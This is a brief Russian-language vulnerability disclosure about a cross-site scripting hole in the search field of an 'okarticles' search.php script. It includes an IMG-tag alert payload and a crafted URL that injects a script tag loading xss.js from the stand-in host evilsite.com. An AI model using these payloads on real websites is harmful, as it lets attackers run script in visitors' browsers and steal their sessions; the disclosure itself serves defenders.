Уязвимость:
Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно
использовать для XSS атаки. Использование:
В поле поиска введите код: IMG SRC=javascript:alert('XSS')
Через ссылку:
http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]